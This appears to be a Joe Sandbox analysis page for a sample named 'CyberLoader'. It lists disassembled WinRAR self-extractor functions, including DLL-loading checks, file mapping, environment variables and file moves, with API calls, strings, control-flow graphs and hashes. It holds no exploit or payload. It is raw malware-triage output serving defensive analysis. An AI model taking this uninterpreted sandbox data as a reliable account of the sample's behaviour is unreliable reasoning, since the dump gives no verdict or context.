                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prologItemTextWindow
                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                  • API String ID: 810644672-8108337
                                                  • Opcode ID: fb4c4916542a2ad4eb4e2c5f2595442c5dbe09e41c69b8be08ebc067897284b8
                                                  • Instruction ID: 9be710c692d2399a34a64b5a1e43210a70fb5a34588f787d49cf826aa11ee46d
                                                  • Opcode Fuzzy Hash: fb4c4916542a2ad4eb4e2c5f2595442c5dbe09e41c69b8be08ebc067897284b8
                                                  • Instruction Fuzzy Hash: FE421775966255BEEB22BF70AC4EFBE777CAB12701F00415AF608A60D2CB744D64CB21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 002800CF Relevance: 98.3, APIs: 22, Strings: 34, Instructions: 317libraryfileloaderCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 257 2800cf-2800ee call 28e360 GetModuleHandleW 260 2800f0-280107 GetProcAddress 257->260 261 280154-2803b2 257->261 264 280109-28011f 260->264 265 280121-280131 GetProcAddress 260->265 262 2803b8-2803c3 call 2970dd 261->262 263 280484-2804b3 GetModuleFileNameW call 27bc85 call 27fe56 261->263 262->263 274 2803c9-2803fa GetModuleFileNameW CreateFileW 262->274 279 2804b5-2804bf call 27acf5 263->279 264->265 265->261 266 280133-280152 265->266 266->261 276 280478-28047f CloseHandle 274->276 277 2803fc-28040a SetFilePointer 274->277 276->263 277->276 280 28040c-280429 ReadFile 277->280 286 2804cc 279->286 287 2804c1-2804c5 call 280085 279->287 280->276 282 28042b-280450 280->282 284 28046d-280476 call 27fbd8 282->284 284->276 294 280452-28046c call 280085 284->294 288 2804ce-2804d0 286->288 291 2804ca 287->291 292 2804f2-280518 call 27bcfb GetFileAttributesW 288->292 293 2804d2-2804f0 CompareStringW 288->293 291->288 296 28051a-28051e 292->296 301 280522 292->301 293->292 293->296 294->284 296->279 300 280520 296->300 302 280526-280528 300->302 301->302 303 28052a 302->303 304 280560-280562 302->304 307 28052c-280552 call 27bcfb GetFileAttributesW 303->307 305 280568-28057f call 27bccf call 27acf5 304->305 306 28066f-280679 304->306 317 280581-2805e2 call 280085 * 2 call 27ddd1 call 27400a call 27ddd1 call 289f35 305->317 318 2805e7-28061a call 27400a AllocConsole 305->318 313 28055c 307->313 314 280554-280558 307->314 313->304 314->307 315 28055a 314->315 315->304 324 280667-280669 ExitProcess 317->324 323 28061c-280661 GetCurrentProcessId AttachConsole call 2935b3 GetStdHandle WriteConsoleW Sleep FreeConsole 318->323 318->324 323->324
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 002800E4
                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002800F6
                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00280127
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 002803D4
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002803F0
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00280402
                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,002A3BA4,00000000), ref: 00280421
                                                  • CloseHandle.KERNEL32(00000000), ref: 00280479
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0028048F
                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 002804E7
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00280510
                                                  • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 0028054A
                                                    • Part of subcall function 00280085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002800A0
                                                    • Part of subcall function 00280085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027EB86,Crypt32.dll,00000000,0027EC0A,?,?,0027EBEC,?,?,?), ref: 002800C2
                                                  • _swprintf.LIBCMT ref: 002805BE
                                                  • _swprintf.LIBCMT ref: 0028060A
                                                    • Part of subcall function 0027400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0027401D
                                                  • AllocConsole.KERNEL32 ref: 00280612
                                                  • GetCurrentProcessId.KERNEL32 ref: 0028061C
                                                  • AttachConsole.KERNEL32(00000000), ref: 00280623
                                                  • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00280649
                                                  • WriteConsoleW.KERNEL32(00000000), ref: 00280650
                                                  • Sleep.KERNEL32(00002710), ref: 0028065B
                                                  • FreeConsole.KERNEL32 ref: 00280661
                                                  • ExitProcess.KERNEL32 ref: 00280669
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                  • String ID: <*$ ?*$(>*$(@*$0A*$4=*$8<*$<?*$@>*$@@*$D=*$DA*$DXGIDebug.dll$P<*$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T;*$T?*$X>*$X@*$\A*$`=*$dwmapi.dll$kernel32$l<*$p>*$p?*$p@*$uxtheme.dll$x=*$|<*$>*$?*
                                                  • API String ID: 1201351596-984101849
                                                  • Opcode ID: a18ae0542078cbd275e5f6f769edfd776a678b3ca75b9b3e882f9e91766fe5d7
                                                  • Instruction ID: 08ebc22711a49ae5952fe55f1752d97d30a0d4fecd3e62cb830eb7c46a7a95ec
                                                  • Opcode Fuzzy Hash: a18ae0542078cbd275e5f6f769edfd776a678b3ca75b9b3e882f9e91766fe5d7
                                                  • Instruction Fuzzy Hash: 60D186B11693849FD730EF50D849B9FBBE8BF86704F40491DF68996190DFB086688F62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028D5D4 Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 197filesleeptimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 002800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 002800E4
                                                    • Part of subcall function 002800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 002800F6
                                                    • Part of subcall function 002800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00280127
                                                    • Part of subcall function 00289DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00289DAC
                                                    • Part of subcall function 0028A335: OleInitialize.OLE32(00000000), ref: 0028A34E
                                                    • Part of subcall function 0028A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028A385
                                                    • Part of subcall function 0028A335: SHGetMalloc.SHELL32(002B8430), ref: 0028A38F
                                                    • Part of subcall function 002813B3: GetCPInfo.KERNEL32(00000000,?), ref: 002813C4
                                                    • Part of subcall function 002813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 002813D8
                                                  • GetCommandLineW.KERNEL32 ref: 0028D61C
                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0028D643
                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0028D654
                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0028D68E
                                                    • Part of subcall function 0028D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028D29D
                                                    • Part of subcall function 0028D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028D2D9
                                                  • CloseHandle.KERNEL32(00000000), ref: 0028D697
                                                  • GetModuleFileNameW.KERNEL32(00000000,002CDC90,00000800), ref: 0028D6B2
                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,002CDC90), ref: 0028D6BE
                                                  • GetLocalTime.KERNEL32(?), ref: 0028D6C9
                                                  • _swprintf.LIBCMT ref: 0028D708
                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0028D71A
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0028D721
                                                  • LoadIconW.USER32(00000000,00000064), ref: 0028D738
                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 0028D789
                                                  • Sleep.KERNEL32(?), ref: 0028D7B7
                                                  • DeleteObject.GDI32 ref: 0028D7F0
                                                  • DeleteObject.GDI32(?), ref: 0028D800
                                                  • CloseHandle.KERNEL32 ref: 0028D843
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xj,
                                                  • API String ID: 788466649-743829192
                                                  • Opcode ID: d450e4d3fcf123b47ba40d8a7b9aec0094842cced68d289b82359c6063ae9a8f
                                                  • Instruction ID: 9f306a542e8d158b206fc55f382501b563757b376dc0ae835358116b09e55cf3
                                                  • Opcode Fuzzy Hash: d450e4d3fcf123b47ba40d8a7b9aec0094842cced68d289b82359c6063ae9a8f
                                                  • Instruction Fuzzy Hash: 2061E075921241AFD320BFA1BC4DF2B37ACAB4A741F04052AF449921E2DF74DD28CB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028BDF5 Relevance: 31.9, APIs: 14, Strings: 4, Instructions: 429windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 406 28bdf5-28be0d call 28e28c call 28e360 411 28ca90-28ca9d 406->411 412 28be13-28be3d call 28aa36 406->412 412->411 415 28be43-28be48 412->415 416 28be49-28be57 415->416 417 28be58-28be6d call 28a6c7 416->417 420 28be6f 417->420 421 28be71-28be86 call 2817ac 420->421 424 28be88-28be8c 421->424 425 28be93-28be96 421->425 424->421 426 28be8e 424->426 427 28ca5c-28ca87 call 28aa36 425->427 428 28be9c 425->428 426->427 427->416 439 28ca8d-28ca8f 427->439 429 28c132-28c134 428->429 430 28bea3-28bea6 428->430 431 28c074-28c076 428->431 432 28c115-28c117 428->432 429->427 435 28c13a-28c141 429->435 430->427 437 28beac-28bf06 call 289da4 call 27b965 call 27a49d call 27a5d7 call 2770bf 430->437 431->427 436 28c07c-28c088 431->436 432->427 438 28c11d-28c12d SetWindowTextW 432->438 435->427 440 28c147-28c160 435->440 441 28c08a-28c09b call 297168 436->441 442 28c09c-28c0a1 436->442 497 28c045-28c05a call 27a52a 437->497 438->427 439->411 444 28c168-28c176 call 2935b3 440->444 445 28c162 440->445 441->442 448 28c0ab-28c0b6 call 28ab9a 442->448 449 28c0a3-28c0a9 442->449 444->427 461 28c17c-28c185 444->461 445->444 453 28c0bb-28c0bd 448->453 449->453 458 28c0c8-28c0e8 call 2935b3 call 2935de 453->458 459 28c0bf-28c0c6 call 2935b3 453->459 480 28c0ea-28c0f1 458->480 481 28c101-28c103 458->481 459->458 465 28c1ae-28c1b1 461->465 466 28c187-28c18b 461->466 472 28c296-28c2a4 call 27fe56 465->472 473 28c1b7-28c1ba 465->473 466->465 470 28c18d-28c195 466->470 470->427 476 28c19b-28c1a9 call 27fe56 470->476 489 28c2a6-28c2ba call 2917cb 472->489 478 28c1bc-28c1c1 473->478 479 28c1c7-28c1e2 473->479 476->489 478->472 478->479 492 28c22c-28c233 479->492 493 28c1e4-28c21e 479->493 486 28c0f8-28c100 call 297168 480->486 487 28c0f3-28c0f5 480->487 481->427 488 28c109-28c110 call 2935ce 481->488 486->481 487->486 488->427 507 28c2bc-28c2c0 489->507 508 28c2c7-28c318 call 27fe56 call 28a8d0 GetDlgItem SetWindowTextW SendMessageW call 2935e9 489->508 499 28c261-28c284 call 2935b3 * 2 492->499 500 28c235-28c24d call 2935b3 492->500 528 28c220 493->528 529 28c222-28c224 493->529 514 28bf0b-28bf1f SetFileAttributesW 497->514 515 28c060-28c06f call 27a4b3 497->515 499->489 534 28c286-28c294 call 27fe2e 499->534 500->499 522 28c24f-28c25c call 27fe2e 500->522 507->508 513 28c2c2-28c2c4 507->513 540 28c31d-28c321 508->540 513->508 516 28bfc5-28bfd5 GetFileAttributesW 514->516 517 28bf25-28bf58 call 27b4f7 call 27b207 call 2935b3 514->517 515->427 516->497 526 28bfd7-28bfe6 DeleteFileW 516->526 549 28bf5a-28bf69 call 2935b3 517->549 550 28bf6b-28bf79 call 27b925 517->550 522->499 526->497 533 28bfe8-28bfeb 526->533 528->529 529->492 537 28bfef-28c01b call 27400a GetFileAttributesW 533->537 534->489 547 28bfed-28bfee 537->547 548 28c01d-28c033 MoveFileW 537->548 540->427 544 28c327-28c33b SendMessageW 540->544 544->427 547->537 548->497 551 28c035-28c03f MoveFileExW 548->551 549->550 556 28bf7f-28bfbe call 2935b3 call 28f350 549->556 550->515 550->556 551->497 556->516
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0028BDFA
                                                    • Part of subcall function 0028AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0028AAFE
                                                  • SetWindowTextW.USER32(?,?), ref: 0028C127
                                                  • _wcsrchr.LIBVCRUNTIME ref: 0028C2B1
                                                  • GetDlgItem.USER32(?,00000066), ref: 0028C2EC
                                                  • SetWindowTextW.USER32(00000000,?), ref: 0028C2FC
                                                  • SendMessageW.USER32(00000000,00000143,00000000,002BA472), ref: 0028C30A
                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0028C335
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                  • API String ID: 3564274579-312220925
                                                  • Opcode ID: e0fb93c1b96611a029987d600276d72d0753f769d71af45b95cb671e41046148
                                                  • Instruction ID: 96ad0a5a5ae9e5bab6c07be42b42d73110fe89eaa92826f154b4cdcffac107e2
                                                  • Opcode Fuzzy Hash: e0fb93c1b96611a029987d600276d72d0753f769d71af45b95cb671e41046148
                                                  • Instruction Fuzzy Hash: E7E18176D11119AADF25EFA0DC49EEF737CAF19311F5040A6FA09E3091EB709A948F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027D341 Relevance: 25.1, APIs: 4, Strings: 10, Instructions: 555COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 561 27d341-27d378 call 28e28c call 28e360 call 2915e8 568 27d3ab-27d3b4 call 27fe56 561->568 569 27d37a-27d3a9 GetModuleFileNameW call 27bc85 call 27fe2e 561->569 573 27d3b9-27d3dd call 279619 call 2799b0 568->573 569->573 580 27d3e3-27d3eb 573->580 581 27d7a0-27d7a6 call 279653 573->581 583 27d3ed-27d405 call 283781 * 2 580->583 584 27d409-27d438 call 295a90 * 2 580->584 585 27d7ab-27d7bb 581->585 594 27d407 583->594 595 27d43b-27d43e 584->595 594->584 596 27d444-27d44a call 279e40 595->596 597 27d56c-27d58f call 279d30 call 2935d3 595->597 601 27d44f-27d476 call 279bf0 596->601 597->581 606 27d595-27d5b0 call 279bf0 597->606 607 27d535-27d538 601->607 608 27d47c-27d484 601->608 620 27d5b2-27d5b7 606->620 621 27d5b9-27d5cc call 2935d3 606->621 612 27d53b-27d55d call 279d30 607->612 610 27d486-27d48e 608->610 611 27d4af-27d4ba 608->611 610->611 614 27d490-27d4aa call 295ec0 610->614 615 27d4e5-27d4ed 611->615 616 27d4bc-27d4c8 611->616 612->595 631 27d563-27d566 612->631 636 27d4ac 614->636 637 27d52b-27d533 614->637 618 27d4ef-27d4f7 615->618 619 27d519-27d51d 615->619 616->615 623 27d4ca-27d4cf 616->623 618->619 625 27d4f9-27d513 call 295ec0 618->625 619->607 626 27d51f-27d522 619->626 627 27d5f1-27d5f8 620->627 621->581 642 27d5d2-27d5ee call 28137a call 2935ce 621->642 623->615 630 27d4d1-27d4e3 call 295808 623->630 625->581 625->619 626->608 632 27d5fc-27d625 call 27fdfb call 2935d3 627->632 633 27d5fa 627->633 630->615 643 27d527 630->643 631->581 631->597 650 27d627-27d62e call 2935ce 632->650 651 27d633-27d649 632->651 633->632 636->611 637->612 642->627 643->637 650->581 654 27d731-27d757 call 27ce72 call 2935ce * 2 651->654 655 27d64f-27d65d 651->655 691 27d771-27d79d call 295a90 * 2 654->691 692 27d759-27d76f call 283781 * 2 654->692 658 27d664-27d669 655->658 660 27d66f-27d678 658->660 661 27d97c-27d984 658->661 665 27d684-27d68b 660->665 666 27d67a-27d67e 660->666 662 27d72b-27d72e 661->662 663 27d98a-27d98e 661->663 662->654 669 27d990-27d996 663->669 670 27d9de-27d9e4 663->670 667 27d691-27d6b6 665->667 668 27d880-27d891 call 27fcbf 665->668 666->661 666->665 672 27d6b9-27d6de call 2935b3 call 295808 667->672 693 27d897-27d8c0 call 27fe56 call 295885 668->693 694 27d976-27d979 668->694 673 27d722-27d725 669->673 674 27d99c-27d9a3 669->674 677 27d9e6-27d9ec 670->677 678 27da0a-27da2a call 27ce72 670->678 709 27d6f6 672->709 710 27d6e0-27d6ea 672->710 673->658 673->662 681 27d9a5-27d9a8 674->681 682 27d9ca 674->682 677->678 679 27d9ee-27d9f4 677->679 696 27da02-27da05 678->696 679->673 686 27d9fa-27da01 679->686 688 27d9c6-27d9c8 681->688 689 27d9aa-27d9ad 681->689 695 27d9cc-27d9d9 682->695 686->696 688->695 698 27d9c2-27d9c4 689->698 699 27d9af-27d9b2 689->699 691->581 692->691 693->694 721 27d8c6-27d93c call 281596 call 27fdfb call 27fdd4 call 27fdfb call 2958d9 693->721 694->661 695->673 698->695 704 27d9b4-27d9b8 699->704 705 27d9be-27d9c0 699->705 704->679 711 27d9ba-27d9bc 704->711 705->695 717 27d6f9-27d6fd 709->717 710->709 716 27d6ec-27d6f4 710->716 711->695 716->717 717->672 720 27d6ff-27d706 717->720 723 27d7be-27d7c1 720->723 724 27d70c-27d71a call 27fdfb 720->724 754 27d93e-27d947 721->754 755 27d94a-27d95f 721->755 723->668 726 27d7c7-27d7ce 723->726 731 27d71f 724->731 729 27d7d6-27d7d7 726->729 730 27d7d0-27d7d4 726->730 729->726 730->729 733 27d7d9-27d7e7 730->733 731->673 735 27d7e9-27d7ec 733->735 736 27d808-27d830 call 281596 733->736 738 27d805 735->738 739 27d7ee-27d803 735->739 744 27d853-27d85b 736->744 745 27d832-27d84e call 2935e9 736->745 738->736 739->735 739->738 747 27d862-27d87b call 27dd6b 744->747 748 27d85d 744->748 745->731 747->731 748->747 754->755 756 27d960-27d967 755->756 757 27d973-27d974 756->757 758 27d969-27d96d 756->758 757->756 758->731 758->757
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 0027D346
                                                  • _wcschr.LIBVCRUNTIME ref: 0027D367
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0027D328,?), ref: 0027D382
                                                  • __fprintf_l.LIBCMT ref: 0027D873
                                                    • Part of subcall function 0028137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0027B652,00000000,?,?,?,00010464), ref: 00281396
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                  • String ID: $ ,$$%s:$$9*$*messages***$*messages***$@%s:$R$RTL$a
                                                  • API String ID: 4184910265-3558133059
                                                  • Opcode ID: a9ea32df4e0813fa9ac4d82274454b6cbc0cdb51cffb742164db6f9b80b08bbd
                                                  • Instruction ID: 0d067facf661aace5b223ccb643b9adf6e3b0debd6d3a8867c749d9f5921dc60
                                                  • Opcode Fuzzy Hash: a9ea32df4e0813fa9ac4d82274454b6cbc0cdb51cffb742164db6f9b80b08bbd
                                                  • Instruction Fuzzy Hash: 6F12B37192021A9BDF24EFA4DC81BEEB7B5FF05710F50856AF509A7181EB709A60CF24
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 0028AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0028AC85
                                                    • Part of subcall function 0028AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028AC96
                                                    • Part of subcall function 0028AC74: IsDialogMessageW.USER32(00010464,?), ref: 0028ACAA
                                                    • Part of subcall function 0028AC74: TranslateMessage.USER32(?), ref: 0028ACB8
                                                    • Part of subcall function 0028AC74: DispatchMessageW.USER32(?), ref: 0028ACC2
                                                  • GetDlgItem.USER32(00000068,002CECB0), ref: 0028CB6E
                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0028A632,00000001,?,?,0028AECB,002A4F88,002CECB0), ref: 0028CB96
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028CBA1
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35B4), ref: 0028CBAF
                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028CBC5
                                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028CBDF
                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028CC23
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028CC31
                                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028CC40
                                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028CC67
                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A431C), ref: 0028CC76
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                  • String ID: \
                                                  • API String ID: 3569833718-2967466578
                                                  • Opcode ID: 39833a752188a763c9aa68132ade038ee53958d0ed63bab5e1f413215bef07d0
                                                  • Instruction ID: dd7723b50428d9eff61b4931b96cc13c7d7988e0fd585d1eac8ed9238cebd7d5
                                                  • Opcode Fuzzy Hash: 39833a752188a763c9aa68132ade038ee53958d0ed63bab5e1f413215bef07d0
                                                  • Instruction Fuzzy Hash: 1631C171546742EBE301EF20AC4EFAB7FACEBA2705F00050AF651961D1DB644D08CB76
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
